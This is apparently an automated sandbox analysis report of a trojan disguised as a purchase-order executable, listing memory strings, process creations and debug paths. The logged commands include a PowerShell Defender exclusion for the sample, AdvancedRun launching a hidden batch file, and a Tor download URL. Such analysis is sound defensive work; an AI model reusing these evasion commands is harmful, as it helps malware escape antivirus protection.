                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-andy-robertson-valuable-quality-19946
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-arsenal-klopp-lijnders-carabao-171668
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-barcelona-real-madrid-psg-17164868
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-champions-league-jurgen-klopp-1996194
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-curtis-jones-jurgen-klopp-19941053
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-gini-wijnaldum-rumours-fitness-199533
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-jurgen-klopp-pressing-tactics-1993836
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-ozan-kabak-future-audition-19954616
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-penalties-premier-league-var-17171391
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289131056.00000000024A0000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-19957850
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-sadio-mane-expected-goals-19932676
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/mohamed-salah-liverpool-goal-flaw-19945816
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/rhian-brewster-liverpool-arsenal-team-17172763
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/rhian-brewster-liverpool-arsenal-team-17172763&
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289131056.00000000024A0000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish-199590
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/transfer-news/
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-1876
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/transfer-news/liverpool-erling-haaland-transfer-weghorst
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/schedule/
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/schedule/liverpool-arsenal-carabao-cup-klopp-17166154
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/search/
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.291099995.0000000003543000.00000004.00000001.sdmp, SWqTT.exe, 00000020.00000002.486317190.0000000006341000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeWindow created: window name: CLIPBRDWNDCLASS

                      System Summary:

                      barindex
                      Initial sample is a PE file and has a suspicious nameShow sources
                      Source: initial sampleStatic PE information: Filename: 08042021New-PurchaseOrder.exe
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeCode function: 1_2_00A2CBB0
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeCode function: 1_2_00A244E0
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeCode function: 1_2_00A24C58
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeCode function: 1_2_00A2CBA0
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeCode function: 32_2_010DA970
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeCode function: 32_2_010D28B8
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeCode function: 32_2_010D22D0
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeCode function: 32_2_010DA96B
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeCode function: String function: 0040B550 appears 50 times
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4952 -s 2784
                      Source: 08042021New-PurchaseOrder.exeStatic PE information: invalid certificate
                      Source: AdvancedRun.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: AdvancedRun.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 08042021New-PurchaseOrder.exeBinary or memory string: OriginalFilename vs 08042021New-PurchaseOrder.exe
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.306148340.0000000007CA8000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameHcAj CBJ.exe2 vs 08042021New-PurchaseOrder.exe
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000000.202307233.0000000000142000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameDimbono.exe0 vs 08042021New-PurchaseOrder.exe
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.293666584.00000000044C0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs 08042021New-PurchaseOrder.exe
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.288756404.0000000000CB0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenlsbres.dll.muij% vs 08042021New-PurchaseOrder.exe
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.302392796.0000000006580000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs 08042021New-PurchaseOrder.exe
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.297172998.0000000004950000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs 08042021New-PurchaseOrder.exe
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.298745128.0000000005590000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameRunPeBraba.dll6 vs 08042021New-PurchaseOrder.exe
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.288723697.0000000000CA0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenlsbres.dllj% vs 08042021New-PurchaseOrder.exe
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.292139953.0000000003659000.00000004.00000001.sdmpBinary or memory string: ,@shell32.dllSHGetSpecialFolderPathWshlwapi.dllSHAutoComplete%2.2X%2.2X%2.2X&lt;&gt;&quot;&deg;&amp;<br><font size="%d" color="#%s"><b></b>\StringFileInfo\\VarFileInfo\Translation%4.4X%4.4X040904E4ProductNameFileDescriptionFileVersionProductVersionCompanyNameInternalNameLegalCopyrightOriginalFileNameRSDSu vs 08042021New-PurchaseOrder.exe
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.292139953.0000000003659000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAdvancedRun.exe8 vs 08042021New-PurchaseOrder.exe
                      Source: 08042021New-PurchaseOrder.exe, 00000011.00000000.276780249.0000000000FA2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameDimbono.exe0 vs 08042021New-PurchaseOrder.exe
                      Source: 08042021New-PurchaseOrder.exeBinary or memory string: OriginalFilenameDimbono.exe0 vs 08042021New-PurchaseOrder.exe
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.302515242.0000000006740000.00000004.00000001.sdmpBinary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb\F
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.303666174.00000000067D0000.00000004.00000001.sdmpBinary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb0309D}\InProcServer32
                      Source: classification engineClassification label: mal96.troj.evad.winEXE@35/25@2/2
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeCode function: 5_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeCode function: 6_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeCode function: 5_2_004095FD CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle,
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeCode function: 5_2_0040A33B FindResourceW,SizeofResource,LoadResource,LockResource,
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeCode function: 5_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeFile created: C:\Users\user\JMfuFTspQyAokpYkLoiLJnktrYABdrUojJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5868:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5904:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6224:120:WilError_01
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4952
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeFile created: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1fJump to behavior
                      Source: 08042021New-PurchaseOrder.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: 08042021New-PurchaseOrder.exeReversingLabs: Detection: 14%
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeFile read: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe:Zone.IdentifierJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe 'C:\Users\user\Desktop\08042021New-PurchaseOrder.exe'
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess created: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe' /SpecialRun 4101d8 4436
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\08042021New-PurchaseOrder.exe' -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\08042021New-PurchaseOrder.exe' -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess created: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe C:\Users\user\Desktop\08042021New-PurchaseOrder.exe
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4952 -s 2784
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe 'C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe'
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe 'C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe'
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess created: C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess created: C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe' /SpecialRun 4101d8 5204
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess created: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\08042021New-PurchaseOrder.exe' -Force
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\08042021New-PurchaseOrder.exe' -Force
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess created: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe C:\Users\user\Desktop\08042021New-PurchaseOrder.exe
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe' /SpecialRun 4101d8 4436
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess created: C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess created: C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe' /SpecialRun 4101d8 5204
                      Source: C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exeProcess created: unknown unknown
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F324E4F9-8496-40b2-A1FF-9617C1C9AFFE}\InProcServer32
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: 08042021New-PurchaseOrder.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: 08042021New-PurchaseOrder.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: System.Core.ni.pdbRSDSD source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: 08042021New-PurchaseOrder.exe, 00000001.00000002.292139953.0000000003659000.00000004.00000001.sdmp, AdvancedRun.exe, 00000005.00000000.233606021.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000023.00000000.377976496.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000025.00000000.411827266.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000026.00000000.421152625.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe.34.dr
                      Source: Binary string: System.Xml.ni.pdb source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb\F source: 08042021New-PurchaseOrder.exe, 00000001.00000002.302515242.0000000006740000.00000004.00000001.sdmp
                      Source: Binary string: System.ni.pdbRSDS source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: System.Core.pdbZ source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: System.Configuration.ni.pdb source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: mscorlib.pdb853321935-2125563209-4053062332-1002_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32# source: 08042021New-PurchaseOrder.exe, 00000001.00000002.303666174.00000000067D0000.00000004.00000001.sdmp
                      Source: Binary string: mscorlib.ni.pdbRSDS source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: jVisualBasic.pdb source: 08042021New-PurchaseOrder.exe, 00000001.00000002.285903784.00000000004F8000.00000004.00000010.sdmp
                      Source: Binary string: System.Configuration.pdb source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb-Q source: 08042021New-PurchaseOrder.exe, 00000001.00000002.302515242.0000000006740000.00000004.00000001.sdmp
                      Source: Binary string: System.Xml.pdb source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: System.pdb source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: Microsoft.VisualBasic.pdb source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: System.Core.ni.pdb source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: jLC:\Windows\Microsoft.VisualBasic.pdb source: 08042021New-PurchaseOrder.exe, 00000001.00000002.285903784.00000000004F8000.00000004.00000010.sdmp
                      Source: Binary string: System.Windows.Forms.pdb source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: O.pdb4( source: 08042021New-PurchaseOrder.exe, 00000001.00000002.285903784.00000000004F8000.00000004.00000010.sdmp
                      Source: Binary string: mscorlib.pdb source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb5t source: 08042021New-PurchaseOrder.exe, 00000001.00000002.302515242.0000000006740000.00000004.00000001.sdmp
                      Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: 08042021New-PurchaseOrder.exe, 00000001.00000002.302660548.0000000006764000.00000004.00000001.sdmp
                      Source: Binary string: System.Drawing.pdb source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: System.Drawing.pdb9 source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: mscorlib.ni.pdb source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: @sxC:\Users\user\Desktop\08042021New-PurchaseOrder.PDBO source: 08042021New-PurchaseOrder.exe, 00000001.00000002.285903784.00000000004F8000.00000004.00000010.sdmp
                      Source: Binary string: ww08042021New-PurchaseOrder.PDB source: 08042021New-PurchaseOrder.exe, 00000001.00000002.285903784.00000000004F8000.00000004.00000010.sdmp
                      Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdbu source: 08042021New-PurchaseOrder.exe, 00000001.00000002.302515242.0000000006740000.00000004.00000001.sdmp
